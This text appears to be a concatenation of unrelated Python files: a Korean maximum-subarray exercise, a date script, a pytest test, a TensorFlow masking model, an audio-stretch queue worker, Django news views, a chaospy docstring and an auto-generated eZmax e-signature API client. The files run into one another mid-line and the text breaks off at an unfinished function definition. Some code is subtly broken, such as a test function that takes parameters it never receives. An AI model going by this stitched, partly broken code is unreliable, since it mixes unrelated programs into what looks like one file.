8개의 숫자가 있다고 하자. 1 2 -4 5 3 -2 9 -10 이 때, 연속 부분이란 연속하여 숫자를 선택하는 것을 말한다. 가능한 연속 부분으로써 [1, 2, -4], [5, 3, -2, 9], [9, -10] 등이 있을 수 있다. 이 연속 부분들 중에서 가장 합이 큰 연속 부분은 [5, 3, -2, 9] 이며, 이보다 더 합을 크게 할 수는 없다. 따라서 연속 부분 최대합은 5+3+(-2)+9 = 15 이다. 실습 입력 첫째 줄에 n개의 숫자가 주어진다. (1 ≤ n ≤ 100,000) 출력 n개의 숫자에 대하여 연속 부분 최대합을 출력한다. 입력 예시 1 2 -4 5 3 -2 9 -10 출력 예시 15 ''' def getSubsum(data) : ''' n개의 숫자가 list로 주어질 때, 그 연속 부분 최대합을 반환하는 함수를 작성하세요. ''' dp = [0] * 100001 dp[0] = data[0] for i in range(len(data)): dp[i] = max(dp[i-1] + data[i], data[i]) return max(dp) print(getSubsum([1, 2, -4, 5, 3, -2, 9, -10]))import datetime as dt import main today = dt.date.today() weekday = today.weekday() def hello_world(): e = dt.datetime.now() print ("Today's date: = %s/%s/%s" % (e.day, e.month, e.year)) print ("The time is now: = %s:%s:%s" % (e.hour, e.minute, e.second)) print("FUCK IT") def days_for_next_friday(): next_friday = today + dt.timedelta( (4- weekday) % 7 ) diff = str(next_friday - today)[0:1] print("Today is: "+str(today) + " and next friday is: "+str(next_friday)+" and there is a difference of "+str(diff)+" days") return diff def days_for_last_friday(): last_friday = today - dt.timedelta(days=weekday) + dt.timedelta(days=4, weeks=0) diff = diff = str(today - last_friday)[0:1] print("Today is: "+str(today) + " and before friday is: "+str(last_friday)+" and there is a difference of "+str(diff)+" days") return diff def time_handler(): if( weekday == 5 or weekday == 6): diff = days_for_last_friday() else: diff = days_for_next_friday() days/10-12-pytest/test_rotate.py import pytest def test_rotate(string, n): """Test the rotate function""" assert rotate('hello', 2) == 'llohe' assert rotate('hello', -2) == 'lohel' 1-10 import tensorflow as tf import tensorflow.contrib.layers as layers from tensorflow.contrib.framework import arg_scope import losses def total_loss_sum(losses): # Assemble all of the losses for the current tower only. # Calculate the total loss for the current tower. regularization_losses = tf.contrib.losses.get_regularization_losses() total_loss = tf.add_n(losses + regularization_losses, name='total_loss') return total_loss def loss(logits, labels, num_classes): xent_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits, labels) loss = tf.reduce_mean(xent_loss) #loss = losses.multiclass_hinge_loss(logits, labels, num_classes) total_loss = total_loss_sum([loss]) return total_loss def layer(net, num_filters, name, is_training): with tf.variable_scope(name): net = tf.contrib.layers.batch_norm(net, **bn_params) net = tf.nn.relu(net) net = layers.convolution2d(net, num_filters, kernel_size=3) #if is_training: #net = tf.nn.dropout(net, keep_prob=0.8) return net def dense_block(net, size, r, name, is_training): with tf.variable_scope(name): outputs = [] for i in range(size): if i < size - 1: x = net net = layer(net, r, 'layer'+str(i), is_training) outputs += [net] net = tf.concat(3, [x, net]) else: net = layer(net, r, 'layer'+str(i), is_training) outputs += [net] net = tf.concat(3, outputs) return net def downsample(net, name, is_training): with tf.variable_scope(name): net = tf.contrib.layers.batch_norm(net) net = tf.nn.relu(net) num_filters = net.get_shape().as_list()[3] net = layers.convolution2d(net, num_filters, kernel_size=1) #if is_training: # net = tf.nn.dropout(net, keep_prob=0.8) net = layers.max_pool2d(net, 2, stride=2, padding='SAME') return net def upsample(net, name): with tf.variable_scope(name): height, width = net.get_shape().as_list()[1:3] print(height, width) net = tf.image.resize_bilinear(net, [2*height, 2*width]) #num_filters = net.get_shape().as_list()[3] #net = tf.contrib.layers.convolution2d_transpose(net, num_filters, kernel_size=3, stride=2) return net def _build(image, num_classes, is_training): global bn_params bn_params = { # Decay for the moving averages. 'decay': 0.999, 'center': True, 'scale': True, # epsilon to prevent 0s in variance. 'epsilon': 0.001, # None to force the updates 'updates_collections': None, 'is_training': is_training, } weight_decay = 1e-4 #init_func = layers.variance_scaling_initializer(mode='FAN_OUT') init_func = layers.variance_scaling_initializer() #2: [3,4,5], #block_sizes = [2,3,4] block_sizes = [2,3,4,5] r = 16 with arg_scope([layers.convolution2d, layers.convolution2d_transpose], stride=1, padding='SAME', activation_fn=None, normalizer_fn=None, normalizer_params=None, weights_initializer=init_func, biases_initializer=None, weights_regularizer=layers.l2_regularizer(weight_decay)): block_outputs = [] with tf.variable_scope('classifier'): net = layers.convolution2d(image, 48, 3, scope='conv0') for i, size in enumerate(block_sizes): print(i, size) x = net net = dense_block(net, size, r, 'block'+str(i), is_training) net = tf.concat(3, [x, net]) block_outputs += [net] if i < len(block_sizes) - 1: net = downsample(net, 'block'+str(i)+'_downsample', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' classif1 out = ') #logits_mid = layers.convolution2d(net, FLAGS.num_classes, 1, # biases_initializer=tf.zeros_initializer, scope='logits_middle') #logits_mid = tf.image.resize_bilinear(logits_mid, [FLAGS.img_height, FLAGS.img_width], # name='resize_logits_middle') #net = tf.nn.relu(net) #num_filters = net.get_shape().as_list()[3] #net = layers.convolution2d(net, num_filters, kernel_size=1) for i, size in reversed(list(enumerate(block_sizes[:-1]))): print(i, size) net = upsample(net, 'block'+str(i)+'_back_upsample') print(block_outputs[i]) net = tf.concat(3, [block_outputs[i], net]) print(net) net = dense_block(net, size, r, 'block'+str(i)+'_back', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' out = ') mask = layers.convolution2d(net, 1, 1, biases_initializer=tf.zeros_initializer, scope='mask') #mask = tf.nn.relu(mask) #mask = tf.minimum(tf.nn.relu(mask), 1) mask = tf.sigmoid(mask) #mask = tf.Print(mask, [tf.reduce_sum(mask)], message='mask sum = ') #reg_scale = 1e-5 reg_scale = 1e-6 #reg_scale = 1e-4 # works! #reg_scale = 5e-6 #reg_scale = 5e-6 mask_regularizer = layers.l1_regularizer(reg_scale) print(mask_regularizer) #mask_regularizer = layers.l2_regularizer(reg_scale) reg_loss = mask_regularizer(mask) #reg_loss = tf.reduce_mean(mask_regularizer(mask)) #l1_loss = 0 image = tf.mul(image, mask) #tf.get_variable_scope().reuse_variables() with tf.variable_scope('classifier', reuse=True): #with tf.variable_scope('classifier2'): net = layers.convolution2d(image, 48, 3, scope='conv0') for i, size in enumerate(block_sizes): print(i, size) x = net net = dense_block(net, size, r, 'block'+str(i), is_training) net = tf.concat(3, [x, net]) if i < len(block_sizes) - 1: net = downsample(net, 'block'+str(i)+'_downsample', is_training) print(net) #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' classif2 out = ') #logits = layers.convolution2d(net, num_classes, 1, biases_initializer=tf.zeros_initializer, # scope='logits') with tf.contrib.framework.arg_scope([layers.fully_connected], activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): #net = layers.flatten(net, scope='flatten') #net = tf.contrib.layers.avg_pool2d(net, kernel_size=4, scope='avg_pool') net = tf.contrib.layers.max_pool2d(net, kernel_size=4, scope='avg_pool') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' maxpool out = ') net = layers.flatten(net, scope='flatten') net = layers.fully_connected(net, 256, scope='fc3') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' fc1 out = ') net = layers.fully_connected(net, 128, scope='fc4') #net = tf.Print(net, [tf.reduce_sum(net)], message=str(i)+' fc2 out = ') logits = layers.fully_connected(net, num_classes, activation_fn=None, scope='logits') #logits = tf.Print(logits, [tf.reduce_sum(logits), tf.reduce_min(logits), tf.reduce_max(logits)], message='logits = ') return logits, mask, reg_loss def build(x, labels, num_classes, is_training, reuse=False): if reuse: tf.get_variable_scope().reuse_variables() #logits = _build(x, is_training) logits, mask, reg_loss = _build(x, num_classes, is_training) total_loss = loss(logits, labels, is_training) + reg_loss #all_vars = tf.contrib.framework.get_variables() #for v in all_vars: # print(v.name) return [total_loss, logits, mask] def build_old(inputs, labels, num_classes, is_training): weight_decay = 1e-4 # to big weight_decay = 5e-3 bn_params = { # Decay for the moving averages. 'decay': 0.999, 'center': True, 'scale': True, # epsilon to prevent 0s in variance. 'epsilon': 0.001, # None to force the updates 'updates_collections': None, 'is_training': is_training, } conv1sz = 32 conv2sz = 64 #conv1sz = 32 #conv2sz = 64 with tf.contrib.framework.arg_scope([layers.convolution2d], kernel_size=3, stride=1, padding='SAME', rate=1, activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, #normalizer_fn=None, weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): net = layers.convolution2d(inputs, conv1sz, scope='conv1_1') net = layers.convolution2d(net, conv1sz, scope='conv1_2') #net = layers.convolution2d(inputs, conv1sz, scope='conv1_1') net = layers.max_pool2d(net, 2, 2, padding='SAME', scope='pool1') net = layers.convolution2d(net, conv2sz, scope='conv2_1') net = layers.convolution2d(net, conv2sz, scope='conv2_2') #net = layers.convolution2d(net, conv2sz, kernel_size=5, scope='conv2_2') net = layers.max_pool2d(net, 2, 2, padding='SAME', scope='pool2') #net = layers.convolution2d(net, conv2sz, padding='VALID', scope='conv3_1') #net = layers.convolution2d(net, conv2sz, kernel_size=1, scope='conv3_2') #net = layers.convolution2d(net, num_classes, kernel_size=1, scope='conv3_3') mask = layers.convolution2d(net, conv2sz, scope='conv1_mask') mask = layers.convolution2d(mask, 1, scope='conv2_mask') #mask = tf.sigmoid(mask) mask = tf.nn.relu(mask) print(mask) #l1_scale = 1e-4 l1_scale = 1e-3 #l1_scale = 1e-9 l1_regularizer = layers.l1_regularizer(l1_scale) l1_loss = l1_regularizer(mask) #l1_loss = 0 #mask = tf.Print(mask, [tf.reduce_sum(mask)], message='MASK=') ##net = layers.convolution2d(net, num_classes, kernel_size=1, normalizer_fn=None, ## activation_fn=None, scope='conv3_3',) #print(net.get_shape()) net = tf.mul(net, mask) net = tf.contrib.layers.avg_pool2d(net, kernel_size=7, scope='avg_pool') print(net) #logits = tf.reshape(logits, [-1, num_classes]) #print(logits.get_shape()) with tf.contrib.framework.arg_scope([layers.fully_connected], activation_fn=tf.nn.relu, normalizer_fn=layers.batch_norm, normalizer_params=bn_params, #normalizer_fn=None, weights_initializer=layers.variance_scaling_initializer(), weights_regularizer=layers.l2_regularizer(weight_decay)): net = layers.flatten(net, scope='flatten') #net = layers.fully_connected(net, 512, scope='fc3') #net = layers.fully_connected(net, 256, scope='fc4') net = layers.fully_connected(net, 256, scope='fc3') net = layers.fully_connected(net, 128, scope='fc4') logits = layers.fully_connected(net, num_classes, activation_fn=None, weights_regularizer=layers.l2_regularizer(weight_decay), scope='logits') loss = build_loss(logits, labels, num_classes) loss += l1_loss return [loss, logits, mask] import os import json import subprocess import beanstalkc from pydub import AudioSegment q = beanstalkc.Connection(host='localhost', port=14711) def stretch_it(job): """ creates a subprocess and calls paulstretch_stereo.py with the proper args. assumes filepath is correct. """ if job.body is not None: data = json.loads(job.body) # convert track to wav filename_chunk = os.path.splitext(data['filename']) converted_track = AudioSegment.from_file(data['filename'], filename_chunk[1][1:]) wav_name = '%s.wav' % filename_chunk[0] converted_track.export(wav_name, format='wav') finished_name = data['uniq_filename'] window = '--window=%f' % data['window'] stretch = '--stretch=%f' % data['stretch'] # Stretch it! subprocess.call(["python", "./utils/paulstretch_stereo.py", window, stretch, wav_name, finished_name]) job.delete() while True: item = q.reserve() stretch_it(item) tananyan/siteee1-10 from django.shortcuts import render from django.views.generic.edit import FormView from django.contrib.auth.forms import AuthenticationForm from django.http import HttpResponseRedirect from django.contrib.auth import login from NewsApp.models import Articles, Comments from NewsApp.forms import CommentForm # для вывода всех постов class postsView(FormView): form_class = AuthenticationForm # Аналогично регистрации, только используем шаблон аутентификации. template_name = "NewsApp/posts.html" # В случае успеха перенаправим на главную. success_url = "../news" def get(self, request): form1 = AuthenticationForm(request.POST) return render(request, 'NewsApp/posts.html', {'object_list': Articles.objects.all().order_by("-date")[:20], 'form': form1, 'user': request.user}) def form_valid(self, form): # Получаем объект пользователя на основе введённых в форму данных. self.user = form.get_user() # Выполняем аутентификацию пользователя. login(self.request, self.user) return super(postsView, self).form_valid(form) # Для вывода одного поста class postView(FormView): form_class = AuthenticationForm model = Articles # Аналогично регистрации, только используем шаблон аутентификации. template_name = "NewsApp/post.html" # В случае успеха перенаправим на главную. success_url = "/news/" def get(self, request, pk): form1 = AuthenticationForm(request.POST) a = dict(atr=self.model.objects.filter(id=pk)) b = {'form': form1} a.update(b) c = {'user': request.user} a.update(c) comments = Comments.objects.filter(comments_article=pk) d = {'commets': comments} a.update(d) form = {'form_comments': CommentForm} a.update(form) return render(request, 'NewsApp/post.html', a) def form_valid(self, form): # Получаем объект пользователя на основе введённых в форму данных. self.user = form.get_user() # Выполняем аутентификацию пользователя. login(self.request, self.user) return super(postView, self).form_valid(form) # Для добавления комментария def addcomment(request, article_id): if request.method == "POST": form = CommentForm(request.POST) if form.is_valid(): comment = form.save(commit=False) comment.comments_article = Articles.objects.get(id=article_id) comment.comments_author = request.user form.save() return HttpResponseRedirect('/news/%s' % article_id) return HttpResponseRedirect('/news/%s' % article_id) r""" Copulas are a type dependency structure imposed on independent variables to achieve to more complex problems without adding too much complexity. To construct a copula one needs a copula transformation and the Copula wrapper:: >>> dist = chaospy.Iid(chaospy.Uniform(), 2) >>> copula = chaospy.Gumbel(dist, theta=1.5) The resulting copula is then ready for use:: >>> copula.sample(5).round(4) array([[0.6536, 0.115 , 0.9503, 0.4822, 0.8725], [0.6286, 0.0654, 0.96 , 0.5073, 0.9705]]) """ from .archimedean import Archimedean from .gumbel import Gumbel from .clayton import Clayton from .joe import Joe from .nataf import Nataf from .t_copula import TCopula q = int(input()) for k in range(q): n = int(input()) conjuntos = [] for i in range(n): conjuntos.append(set(input().split()[1:])) m = int(input()) for j in range(m): a, b, c = map(int, input().split()) conj1 = conjuntos[b - 1] conj2 = conjuntos[c - 1] if a == 1: print(len(conj1.intersection(conj2))) else: print(len(conj1.union(conj2))) 0 """ eZmax API Definition This API expose all the functionnalities for the eZmax and eZsign applications. # noqa: E501 The version of the OpenAPI document: 1.1.3 Contact: Generated by: https://openapi-generator.tech """ import re # noqa: F401 import sys # noqa: F401 from eZmaxApi.api_client import ApiClient, Endpoint as _Endpoint from eZmaxApi.model_utils import ( # noqa: F401 check_allowed_values, check_validations, date, datetime, file_type, none_type, validate_and_convert_types ) from eZmaxApi.model.common_response_error import CommonResponseError from eZmaxApi.model.ezsignfolder_create_object_v1_request import EzsignfolderCreateObjectV1Request from eZmaxApi.model.ezsignfolder_create_object_v1_response import EzsignfolderCreateObjectV1Response from eZmaxApi.model.ezsignfolder_delete_object_v1_response import EzsignfolderDeleteObjectV1Response from eZmaxApi.model.ezsignfolder_get_forms_data_v1_response import EzsignfolderGetFormsDataV1Response from eZmaxApi.model.ezsignfolder_get_list_v1_response import EzsignfolderGetListV1Response from eZmaxApi.model.ezsignfolder_get_object_v1_response import EzsignfolderGetObjectV1Response from eZmaxApi.model.ezsignfolder_send_v1_request import EzsignfolderSendV1Request from eZmaxApi.model.ezsignfolder_send_v1_response import EzsignfolderSendV1Response from eZmaxApi.model.ezsignfolder_unsend_v1_response import EzsignfolderUnsendV1Response from eZmaxApi.model.header_accept_language import HeaderAcceptLanguage class ObjectEzsignfolderApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client self.ezsignfolder_create_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderCreateObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder', 'operation_id': 'ezsignfolder_create_object_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'ezsignfolder_create_object_v1_request', ], 'required': [ 'ezsignfolder_create_object_v1_request', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'ezsignfolder_create_object_v1_request': ([EzsignfolderCreateObjectV1Request],), }, 'attribute_map': { }, 'location_map': { 'ezsignfolder_create_object_v1_request': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) self.ezsignfolder_delete_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderDeleteObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}', 'operation_id': 'ezsignfolder_delete_object_v1', 'http_method': 'DELETE', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_children_v1_endpoint = _Endpoint( settings={ 'response_type': None, 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/getChildren', 'operation_id': 'ezsignfolder_get_children_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_forms_data_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetFormsDataV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/getFormsData', 'operation_id': 'ezsignfolder_get_forms_data_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json', 'application/zip' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_list_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetListV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/getList', 'operation_id': 'ezsignfolder_get_list_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'e_order_by', 'i_row_max', 'i_row_offset', 'accept_language', 's_filter', ], 'required': [], 'nullable': [ ], 'enum': [ 'e_order_by', ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { ('e_order_by',): { "PKIEZSIGNFOLDERID_ASC": "pkiEzsignfolderID_ASC", "PKIEZSIGNFOLDERID_DESC": "pkiEzsignfolderID_DESC", "SEZSIGNFOLDERDESCRIPTION_ASC": "sEzsignfolderDescription_ASC", "SEZSIGNFOLDERDESCRIPTION_DESC": "sEzsignfolderDescription_DESC", "DTCREATEDDATE_ASC": "dtCreatedDate_ASC", "DTCREATEDDATE_DESC": "dtCreatedDate_DESC", "FKIEZSIGNFOLDERTYPEID_ASC": "fkiEzsignfoldertypeID_ASC", "FKIEZSIGNFOLDERTYPEID_DESC": "fkiEzsignfoldertypeID_DESC", "SEZSIGNFOLDERTYPENAMEX_ASC": "sEzsignfoldertypeNameX_ASC", "SEZSIGNFOLDERTYPENAMEX_DESC": "sEzsignfoldertypeNameX_DESC", "EEZSIGNFOLDERSTEP_ASC": "eEzsignfolderStep_ASC", "EEZSIGNFOLDERSTEP_DESC": "eEzsignfolderStep_DESC", "DTEZSIGNFOLDERSENTDATE_ASC": "dtEzsignfolderSentdate_ASC", "DTEZSIGNFOLDERSENTDATE_DESC": "dtEzsignfolderSentdate_DESC", "DTDUEDATE_ASC": "dtDueDate_ASC", "DTDUEDATE_DESC": "dtDueDate_DESC", "ITOTALDOCUMENT_ASC": "iTotalDocument_ASC", "ITOTALDOCUMENT_DESC": "iTotalDocument_DESC", "ITOTALDOCUMENTEDM_ASC": "iTotalDocumentEdm_ASC", "ITOTALDOCUMENTEDM_DESC": "iTotalDocumentEdm_DESC", "ITOTALSIGNATURE_ASC": "iTotalSignature_ASC", "ITOTALSIGNATURE_DESC": "iTotalSignature_DESC", "ITOTALSIGNATURESIGNED_ASC": "iTotalSignatureSigned_ASC", "ITOTALSIGNATURESIGNED_DESC": "iTotalSignatureSigned_DESC" }, }, 'openapi_types': { 'e_order_by': (str,), 'i_row_max': (int,), 'i_row_offset': (int,), 'accept_language': (HeaderAcceptLanguage,), 's_filter': (str,), }, 'attribute_map': { 'e_order_by': 'eOrderBy', 'i_row_max': 'iRowMax', 'i_row_offset': 'iRowOffset', 'accept_language': 'Accept-Language', 's_filter': 'sFilter', }, 'location_map': { 'e_order_by': 'query', 'i_row_max': 'query', 'i_row_offset': 'query', 'accept_language': 'header', 's_filter': 'query', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json', 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_get_object_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderGetObjectV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}', 'operation_id': 'ezsignfolder_get_object_v1', 'http_method': 'GET', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', ], 'required': [ 'pki_ezsignfolder_id', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [], }, api_client=api_client ) self.ezsignfolder_send_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderSendV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/send', 'operation_id': 'ezsignfolder_send_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', 'ezsignfolder_send_v1_request', ], 'required': [ 'pki_ezsignfolder_id', 'ezsignfolder_send_v1_request', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), 'ezsignfolder_send_v1_request': (EzsignfolderSendV1Request,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', 'ezsignfolder_send_v1_request': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) self.ezsignfolder_unsend_v1_endpoint = _Endpoint( settings={ 'response_type': (EzsignfolderUnsendV1Response,), 'auth': [ 'Authorization' ], 'endpoint_path': '/1/object/ezsignfolder/{pkiEzsignfolderID}/unsend', 'operation_id': 'ezsignfolder_unsend_v1', 'http_method': 'POST', 'servers': None, }, params_map={ 'all': [ 'pki_ezsignfolder_id', 'body', ], 'required': [ 'pki_ezsignfolder_id', 'body', ], 'nullable': [ ], 'enum': [ ], 'validation': [ ] }, root_map={ 'validations': { }, 'allowed_values': { }, 'openapi_types': { 'pki_ezsignfolder_id': (int,), 'body': (str,), }, 'attribute_map': { 'pki_ezsignfolder_id': 'pkiEzsignfolderID', }, 'location_map': { 'pki_ezsignfolder_id': 'path', 'body': 'body', }, 'collection_format_map': { } }, headers_map={ 'accept': [ 'application/json' ], 'content_type': [ 'application/json' ] }, api_client=api_client ) def ezsignfolder_create_object_v1( self, ezsignfolder_create_object_v1_request, **kwargs ): """Create a new Ezsignfolder # noqa: E501 The endpoint allows to create one or many elements at once. The array can contain simple (Just the object) or compound (The object and its child) objects. Creating compound elements allows to reduce the multiple requests to create all child objects. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_create_object_v1(ezsignfolder_create_object_v1_request, async_req=True) >>> result = thread.get() Args: ezsignfolder_create_object_v1_request ([EzsignfolderCreateObjectV1Request]): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderCreateObjectV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['ezsignfolder_create_object_v1_request'] = \ ezsignfolder_create_object_v1_request return self.ezsignfolder_create_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_delete_object_v1( self, pki_ezsignfolder_id, **kwargs ): """Delete an existing Ezsignfolder # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_delete_object_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderDeleteObjectV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_delete_object_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_get_children_v1( self, pki_ezsignfolder_id, **kwargs ): """Retrieve an existing Ezsignfolder's children IDs # noqa: E501 ## ⚠️EARLY ADOPTERS WARNING ### This endpoint is not officially released. Its definition might still change and it might not be available in every environment and region. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_get_children_v1(pki_ezsignfolder_id, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: None If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id return self.ezsignfolder_get_children_v1_endpoint.call_with_http_info(**kwargs) def 